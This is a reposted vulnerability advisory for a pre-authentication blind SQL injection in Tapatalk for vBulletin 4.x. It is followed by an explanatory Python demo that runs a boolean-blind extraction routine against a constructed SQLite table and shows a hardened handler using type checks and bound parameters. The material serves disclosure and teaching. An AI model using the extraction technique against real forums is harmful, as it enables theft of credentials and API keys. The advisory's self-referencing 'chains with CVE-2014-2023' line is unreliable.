Nytro

CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)

Posted

[h=2]Overview[/h]

date: 10/12/2014

cvss: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base

cwe: 89

vendor: Tapatalk Inc

product: Tapatalk for vBulletin 4.x

versions affected: latest (to date)

* 5.2.1 (verified)
* 4.9.0 (verified)

exploitability:

* remotely exploitable

* NO authentication required

* NO user interaction required

* NO special configuration required (default settings)

[h=2]Abstract[/h]

Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls, allowing unauthenticated users to inject arbitrary SQL commands.

risk: high

!! Note !! - this is a preliminary VulnNote. The full PoC / description will be made available within the next 7 days (see contact) to allow Mobiquo to fix this.

googledork: see PoC code

[h=2]Details[/h]

vulnerable component:

* stripped // see full VulnNote - (contact)

The xmlrpc request is decoded, and the decoded attacker-provided values are used directly in an SQL query.

[h=2]Proof of Concept (PoC)[/h]

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

1) prerequisites

vBulletin 4.x with Tapatalk for vBulletin 4.x installed

2) run PoC

edit the PoC to match your TARGET (optionally set DEBUG=True)

(optionally) edit the query to extract specific database values

Note: the PoC will try to detect Tapatalk on that host

run the PoC

by default it extracts

* the MySQL root password hash (in case the vBulletin db user has permissions to do so)
* vBulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

only limited by the vBulletin db_user access permissions

[h=2]Timeline[/h]

2014-01-14: initial vendor contact, no response

2014-02-24: vendor contact, no response

2014-10-13: public disclosure

[h=2]Contact[/h]

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023
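The advisory only says that a decoded xmlrpc value ends up inside an SQL query and that the PoC extracts data blindly. The following is an added, self-contained illustration of that bug class and of the boolean-blind extraction technique; it is not tintinweb's PoC and not Tapatalk or vBulletin code. The method name `get_thread`, the `thread`/`setting` tables, the `apikey` value and the use of SQLite in place of MySQL are all assumptions made for the example. It pairs the vulnerable handler with a hardened one that type-checks the XML-RPC parameter and binds it.

```python
import sqlite3
import xmlrpc.client

# Constructed stand-in for the forum database. Table and column names are
# illustrative, not vBulletin's real schema; 'apikey' mirrors the field the
# advisory says its PoC extracts by default.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE setting (varname TEXT, value TEXT)")
    db.execute("INSERT INTO setting VALUES ('apikey', 'a1b2c3d4')")
    db.execute("CREATE TABLE thread (threadid INTEGER, title TEXT)")
    db.execute("INSERT INTO thread VALUES (1, 'Welcome')")
    return db

def build_request(thread_id):
    # Client side: any Python value becomes an XML-RPC <param>; a string payload
    # arrives as <string>, which the vulnerable server never checks.
    return xmlrpc.client.dumps((thread_id,), methodname="get_thread")

def decode_request(body):
    params, method = xmlrpc.client.loads(body)
    return method, params

def vulnerable_handler(db, body):
    # Bug pattern from the advisory: the decoded XML-RPC value is formatted
    # straight into the SQL text. Returns True when a thread row was found,
    # which is the single bit the blind attack observes.
    _method, params = decode_request(body)
    thread_id = params[0]
    sql = "SELECT title FROM thread WHERE threadid = %s" % thread_id
    return db.execute(sql).fetchone() is not None

def hardened_handler(db, body):
    # Fix: reject anything that is not an XML-RPC <int> and bind the value as a
    # parameter, so the SQL text never contains attacker-controlled characters.
    _method, params = decode_request(body)
    thread_id = params[0]
    if not isinstance(thread_id, int):
        return False
    sql = "SELECT title FROM thread WHERE threadid = ?"
    return db.execute(sql, (thread_id,)).fetchone() is not None

def oracle(db, condition):
    # Boolean-blind oracle: thread 1 exists, so the response is True exactly
    # when the injected condition is true.
    return vulnerable_handler(db, build_request("1 AND (%s)" % condition))

def blind_int(db, expr, lo=0, hi=255):
    # Binary-search the integer value of an SQL expression using only the
    # oracle: eight requests per value instead of up to 256.
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, "(%s) > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_string(db, expr):
    # Recover a string-valued expression one character at a time. unicode() and
    # substr() are SQLite; against MySQL the equivalents are ord() and substring().
    length = blind_int(db, "length(%s)" % expr)
    return "".join(
        chr(blind_int(db, "unicode(substr(%s, %d, 1))" % (expr, pos)))
        for pos in range(1, length + 1)
    )

def run_demo():
    # Leak the constructed apikey through the vulnerable handler, then show the
    # hardened handler returns nothing for the same kind of payload.
    db = build_db()
    leaked = extract_string(db, "(SELECT value FROM setting WHERE varname = 'apikey')")
    blocked = hardened_handler(db, build_request("1 AND 1=1"))
    return leaked, blocked

if __name__ == "__main__":
    leaked, blocked = run_demo()
    print("leaked apikey:", leaked)
    print("hardened handler returned a row for the payload:", blocked)
```

The only thing the attacker ever sees is whether the call returned a thread, which is why the advisory can extract arbitrary rows (subject to the db user's grants) without any error message or data in the response. The hardened handler shows the two checks that remove the bug: the decoded parameter must be the type the method expects, and it must reach the database as a bound value, never as SQL text.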
